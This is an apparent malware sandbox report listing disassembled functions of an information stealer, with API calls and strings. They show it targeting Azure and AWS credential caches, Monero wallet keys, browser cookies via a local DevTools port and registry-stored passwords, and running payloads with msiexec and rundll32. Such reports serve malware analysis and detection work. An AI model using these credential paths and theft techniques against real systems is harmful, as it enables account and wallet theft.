                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                        • API String ID: 949356159-974132213
                                        • Opcode ID: 9ec4a681b127e8f3b3b14acd46bdf15ecc636e6fdba0e9da64632742e4b3b5a6
                                        • Instruction ID: d2d94d69a95cefd0c8cc949b0f59786d98201511af93275d6d4cca2526de04d1
                                        • Opcode Fuzzy Hash: 9ec4a681b127e8f3b3b14acd46bdf15ecc636e6fdba0e9da64632742e4b3b5a6
                                        • Instruction Fuzzy Hash: 2541A3FA940208B7DB64F770EC9BFDD33385B64705F404458B24966181FEB8ABC88B92
                                        Function 007C3080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 007C3415
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 007C35AD
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 007C373A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell$lstrcpy
                                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                        • API String ID: 2507796910-3625054190
                                        • Opcode ID: 4b7d96d3e9b78b6a475bee3aea8ece4e73abaadfb881b81395c44d7322281a0a
                                        • Instruction ID: e260d8cc49f2f36df3597bc00bbeda2c11214f2342c27b5a002e19c54dd233d0
                                        • Opcode Fuzzy Hash: 4b7d96d3e9b78b6a475bee3aea8ece4e73abaadfb881b81395c44d7322281a0a
                                        • Instruction Fuzzy Hash: D812EDB191010CEACB14EFA0DDAAFEDB739AF14305F00459DE50666192EF386F49CB66
                                        Function 007B9BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007B9A50: InternetOpenA.WININET(007D0AF6,00000001,00000000,00000000,00000000), ref: 007B9A6A
                                        • lstrcat.KERNEL32(?,cookies), ref: 007B9CAF
                                        • lstrcat.KERNEL32(?,007D12C4), ref: 007B9CC1
                                        • lstrcat.KERNEL32(?,?), ref: 007B9CD5
                                        • lstrcat.KERNEL32(?,007D12C8), ref: 007B9CE7
                                        • lstrcat.KERNEL32(?,?), ref: 007B9CFB
                                        • lstrcat.KERNEL32(?,.txt), ref: 007B9D0D
                                        • lstrlen.KERNEL32(00000000), ref: 007B9D17
                                        • lstrlen.KERNEL32(00000000), ref: 007B9D26
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                        • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                        • API String ID: 3174675846-3542011879
                                        • Opcode ID: 706fedf6afad9b56a298c9ae272a73e18c0daee95c192b11c041e2869f9d7055
                                        • Instruction ID: db90234ad2579a0e66b9bbece078ad09902062dbbadbe36148bbd94c3e3c44f5
                                        • Opcode Fuzzy Hash: 706fedf6afad9b56a298c9ae272a73e18c0daee95c192b11c041e2869f9d7055
                                        • Instruction Fuzzy Hash: FB515EB1910608EBCB14EBE4DC99FEE7738AF44301F404558F21AA7191EF79AA49CF61
                                        Function 007C5510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                          • Part of subcall function 007B62D0: InternetOpenA.WININET(007D0DFF,00000001,00000000,00000000,00000000), ref: 007B6331
                                          • Part of subcall function 007B62D0: StrCmpCA.SHLWAPI(?,0165F1C0), ref: 007B6353
                                          • Part of subcall function 007B62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007B6385
                                          • Part of subcall function 007B62D0: HttpOpenRequestA.WININET(00000000,GET,?,0165ECD0,00000000,00000000,00400100,00000000), ref: 007B63D5
                                          • Part of subcall function 007B62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007B640F
                                          • Part of subcall function 007B62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007B6421
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007C5568
                                        • lstrlen.KERNEL32(00000000), ref: 007C557F
                                          • Part of subcall function 007C8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007C8FE2
                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 007C55B4
                                        • lstrlen.KERNEL32(00000000), ref: 007C55D3
                                        • lstrlen.KERNEL32(00000000), ref: 007C55FE
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 3240024479-1526165396
                                        • Opcode ID: 91364f86d43c5abd0f77ab874a6857f5873aa78646c1d298bf410ef90f410968
                                        • Instruction ID: 3e67e30f84857bacd709426a4d6cbde462511046aad7989e7773415ce3434e80
                                        • Opcode Fuzzy Hash: 91364f86d43c5abd0f77ab874a6857f5873aa78646c1d298bf410ef90f410968
                                        • Instruction Fuzzy Hash: 3651D97061010CEBCB18FF64C9AAFED773AAF10346F90445CE50666592EB386F45CB62
                                        Function 007C1520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2001356338-0
                                        • Opcode ID: 089755b69ef6b9cb226001ece7b81f0eca9b1a28f69eaa951850d5a1aa4aeb78
                                        • Instruction ID: 366809d173f6a7be4d063ba9dbe94fe7e1e589301062e9e17179a33b0b13e23d
                                        • Opcode Fuzzy Hash: 089755b69ef6b9cb226001ece7b81f0eca9b1a28f69eaa951850d5a1aa4aeb78
                                        • Instruction Fuzzy Hash: BBC16FB5900119EBCB14EF60DC99FEE7379AB64304F00459DE50AA7242EB78EA85CF91
                                        Function 007C44D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007C8F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C453C
                                        • lstrcat.KERNEL32(?,0165EC70), ref: 007C455B
                                        • lstrcat.KERNEL32(?,?), ref: 007C456F
                                        • lstrcat.KERNEL32(?,0165D128), ref: 007C4583
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007C8F20: GetFileAttributesA.KERNEL32(00000000,?,007B1B94,?,?,007D577C,?,?,007D0E22), ref: 007C8F2F
                                          • Part of subcall function 007BA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 007BA489
                                          • Part of subcall function 007BA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007BA13C
                                          • Part of subcall function 007BA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007BA161
                                          • Part of subcall function 007BA110: LocalAlloc.KERNEL32(00000040,?), ref: 007BA181
                                          • Part of subcall function 007BA110: ReadFile.KERNEL32(000000FF,?,00000000,007B148F,00000000), ref: 007BA1AA
                                          • Part of subcall function 007BA110: LocalFree.KERNEL32(007B148F), ref: 007BA1E0
                                          • Part of subcall function 007BA110: CloseHandle.KERNEL32(000000FF), ref: 007BA1EA
                                          • Part of subcall function 007C9550: GlobalAlloc.KERNEL32(00000000,007C462D,007C462D), ref: 007C9563
                                        • StrStrA.SHLWAPI(?,0165ED90), ref: 007C4643
                                        • GlobalFree.KERNEL32(?), ref: 007C4762
                                          • Part of subcall function 007BA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O{,00000000,00000000), ref: 007BA23F
                                          • Part of subcall function 007BA210: LocalAlloc.KERNEL32(00000040,?,?,?,007B4F3E,00000000,?), ref: 007BA251
                                          • Part of subcall function 007BA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O{,00000000,00000000), ref: 007BA27A
                                          • Part of subcall function 007BA210: LocalFree.KERNEL32(?,?,?,?,007B4F3E,00000000,?), ref: 007BA28F
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C46F3
                                        • StrCmpCA.SHLWAPI(?,007D08D2), ref: 007C4710
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 007C4722
                                        • lstrcat.KERNEL32(00000000,?), ref: 007C4735
                                        • lstrcat.KERNEL32(00000000,007D0FA0), ref: 007C4744
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                        • String ID:
                                        • API String ID: 3541710228-0
                                        • Opcode ID: ac4b86aa5e27ca63bd74f4c3d293c794ab09689de8a7701cebe070f1f4ab032d
                                        • Instruction ID: 71a167ca778c8203eeae7ea71964ab88e733eba6c1162c24cc4e03ae245786c6
                                        • Opcode Fuzzy Hash: ac4b86aa5e27ca63bd74f4c3d293c794ab09689de8a7701cebe070f1f4ab032d
                                        • Instruction Fuzzy Hash: A17134B6900208BBDB14EBE4DD9AFDE7779AB88300F00859CF60597181EB39DB55CB61
                                        Function 007B1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007B12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007B12B4
                                          • Part of subcall function 007B12A0: RtlAllocateHeap.NTDLL(00000000), ref: 007B12BB
                                          • Part of subcall function 007B12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007B12D7
                                          • Part of subcall function 007B12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007B12F5
                                          • Part of subcall function 007B12A0: RegCloseKey.ADVAPI32(?), ref: 007B12FF
                                        • lstrcat.KERNEL32(?,00000000), ref: 007B134F
                                        • lstrlen.KERNEL32(?), ref: 007B135C
                                        • lstrcat.KERNEL32(?,.keys), ref: 007B1377
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007C8CF0: GetSystemTime.KERNEL32(007D0E1B,0165E2E8,007D05B6,?,?,007B13F9,?,0000001A,007D0E1B,00000000,?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007C8D16
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 007B1465
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                          • Part of subcall function 007BA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007BA13C
                                          • Part of subcall function 007BA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 007BA161
                                          • Part of subcall function 007BA110: LocalAlloc.KERNEL32(00000040,?), ref: 007BA181
                                          • Part of subcall function 007BA110: ReadFile.KERNEL32(000000FF,?,00000000,007B148F,00000000), ref: 007BA1AA
                                          • Part of subcall function 007BA110: LocalFree.KERNEL32(007B148F), ref: 007BA1E0
                                          • Part of subcall function 007BA110: CloseHandle.KERNEL32(000000FF), ref: 007BA1EA
                                        • DeleteFileA.KERNEL32(00000000), ref: 007B14EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                        • API String ID: 3478931302-218353709
                                        • Opcode ID: 41cde09d559d3cb82e8675674b4fcc5562141fd89ebbe5bebf910c3b03247dd6
                                        • Instruction ID: 549b2775574d1c0e73e2104a25458cec9ea8a41fb700dae62b25653ac5020edd
                                        • Opcode Fuzzy Hash: 41cde09d559d3cb82e8675674b4fcc5562141fd89ebbe5bebf910c3b03247dd6
                                        • Instruction Fuzzy Hash: E15141B195011CABCB14FB60DDAAFED733D9B54305F4045DCB60A62092EE346B89CBA6
                                        Function 007B9A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenA.WININET(007D0AF6,00000001,00000000,00000000,00000000), ref: 007B9A6A
                                        • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 007B9AAB
                                        • InternetCloseHandle.WININET(00000000), ref: 007B9AC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$Open$CloseHandle
                                        • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                        • API String ID: 3289985339-2144369209
                                        • Opcode ID: 31dd9466e21d116eec96e0924d61d9d63f7f55c8b067817e10de89753be54031
                                        • Instruction ID: d6dc6442e220bbb1c4aa2c06decace1db363216277187ca7bb9766f0a12a8fe6
                                        • Opcode Fuzzy Hash: 31dd9466e21d116eec96e0924d61d9d63f7f55c8b067817e10de89753be54031
                                        • Instruction Fuzzy Hash: E2412D75A10258EFCB14EF94CC99FDD7778BB48740F104199F615A6190DBB8AE80CBA0
                                        Function 007B7630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007B7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007B739A
                                          • Part of subcall function 007B7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007B7411
                                          • Part of subcall function 007B7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 007B746D
                                          • Part of subcall function 007B7330: GetProcessHeap.KERNEL32(00000000,?), ref: 007B74B2
                                          • Part of subcall function 007B7330: HeapFree.KERNEL32(00000000), ref: 007B74B9
                                        • lstrcat.KERNEL32(00000000,007D192C), ref: 007B7666
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 007B76A8
                                        • lstrcat.KERNEL32(00000000, : ), ref: 007B76BA
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 007B76EF
                                        • lstrcat.KERNEL32(00000000,007D1934), ref: 007B7700
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 007B7733
                                        • lstrcat.KERNEL32(00000000,007D1938), ref: 007B774D
                                        • task.LIBCPMTD ref: 007B775B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
